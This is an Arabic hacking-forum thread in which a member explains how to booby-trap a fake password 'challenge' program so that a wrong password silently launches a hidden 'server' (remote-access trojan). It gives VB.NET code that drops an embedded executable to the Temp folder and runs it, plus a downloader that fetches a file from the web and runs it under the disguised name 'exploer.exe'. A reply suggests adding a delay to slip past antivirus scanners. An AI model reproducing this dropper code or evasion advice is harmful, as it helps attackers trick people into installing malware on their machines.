1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ تلغيم ] فكرة تلغيم بسيطة

الموضوع في 'حماية الأجهزة' بواسطة جـعـفـر الـشـمـري, بتاريخ ‏16 أكتوبر 2015.

كاتب الموضوع : جـعـفـر الـشـمـري المشاهدات : 815 الردود : 28 ‏16 أكتوبر 2015
  1. غير متصل

    جـعـفـر الـشـمـري
    DeveloPer Plus

    عضو منذ:
    ‏26 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    [​IMG]
    كيف حالكم اعضاء وزوار عراق تيم
    اليوم موضوعي عن فكرة تلغيم بسيطة تفيد بالتحديات كيف ؟
    مثلا تعمل تحدي دوت نت
    الا بدخول الباسورد يعمل مثلا او تضهر الرسالة او عمل استخراج الباسورد


    فكرة التلغيم سوف تعمل اذا ادخل باسورد خطأ يشتغل السيرفر ^_^


    [​IMG]


    نضع textbox1 و button1
    نضغط دبل كليك على button1
    ونكتب
    كود:
     If TextBox1.Text = "1234" Then
           ("MsgBox("jaffar
            Else
              ("MsgBox("jaffarhassan
    
    
            End If
    
    

    [​IMG]
    الكود واضح اذا ادخلنا الباسورد صحيح يشتغل مسج بوكس واذا خطأ هم مسج بوكس لكن انت ضع بمكان المسج بوكس كود استدعاء السيرفر من الريسورس


    كود:
    On Error Resume Next
            Dim Dir As String = My.Computer.FileSystem.SpecialDirectories.Temp
            Dim Filename As String = Dir + "ff.exe"
            IO.File.WriteAllBytes(Filename, My.Resources.ff)
            Process.Start(Filename)
    
    [​IMG]


    او استخدم كود داونلودر




    كود:
                Dim web As New System.Net.WebClient
                web.DownloadFile("???? ??????", Environ("tmp") & "/exploer.exe")
                Shell(Environ("tmp") & "/exploer.exe")
    


    [​IMG]
    تستطيع ان تشفر الباسورد بخوارزميات قوية


    وان تحمي البرنامج بحمايات قوية لكي يصعب عليه استخراج الباسورد والفكرة حلوة يعن انه مشغول بحل التحدي واذا ادخل الباسورد خطأ يشتغل السيرفر ^_~
    [​IMG]




    اتمنى ان ينال اعجابكم


    [​IMG]




     


    جاري تحميل الصفحة...
  2. غير متصل

    سكيورتي ارهابي
    ExpErt DeveloPer

    عضو منذ:
    ‏1 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    53
    نقاط الجائزة:
    الوظيفة:
    ماكسي مول
    الإقامة:

    رد: فكرة تلغيم بسيطة

    وعليكم السلام احسنت حبيبي لكن فقد شغله بسيطه اذا كان السيرفر يشتغل مباشرا راح يشك انو الضحيه بان سيرفر اشتغل الا اذا ان عملت له سليب اعتقد يتخطى الفاحص احسنت ولاتحرمنا


    )4:")4:"​
     


  3. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    739
    نقاط الجائزة:
    الإقامة:

    رد: فكرة تلغيم بسيطة

    الف شكر لك فكرة رائعة تسلم ع الطرررح {1!9}
     


  4. غير متصل

    Ameer Eagle V.I.P
    طاقم الإدارة

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: فكرة تلغيم بسيطة

    أحسنت جعفر . بارك الله بيك
     


  5. غير متصل

    Mira Mrmr .::|| زهره منتدى عراق تيم ||::.
    V • I • P

    عضو منذ:
    ‏9 يوليو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    134
    نقاط الجائزة:
    الجنس:
    أنثى
    الإقامة:

    رد: فكرة تلغيم بسيطة

    [​IMG]فكره حلؤه عاشت ايدك[​IMG]
     


  6. غير متصل

    جـعـفـر الـشـمـري
    DeveloPer Plus

    عضو منذ:
    ‏26 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: فكرة تلغيم بسيطة

    انت العايش حبيبي علاوي


    صحيح فكرتك نورتني,وشكرا على المرور :lolًٌُ:ٌ
     


  7. غير متصل

    جـعـفـر الـشـمـري
    DeveloPer Plus

    عضو منذ:
    ‏26 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: فكرة تلغيم بسيطة

    نورتني اخوية وشكرا على المرور {3$0}
     


  8. غير متصل

    جـعـفـر الـشـمـري
    DeveloPer Plus

    عضو منذ:
    ‏26 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: فكرة تلغيم بسيطة

    احسن الله اليك اخوية


    نورت
     


  9. غير متصل

    جـعـفـر الـشـمـري
    DeveloPer Plus

    عضو منذ:
    ‏26 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: فكرة تلغيم بسيطة

    ايدج العايشة نورتي اختي
     


  10. غير متصل

    Bad Man
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏8 أغسطس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: فكرة تلغيم بسيطة

    بارك الله بيك
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...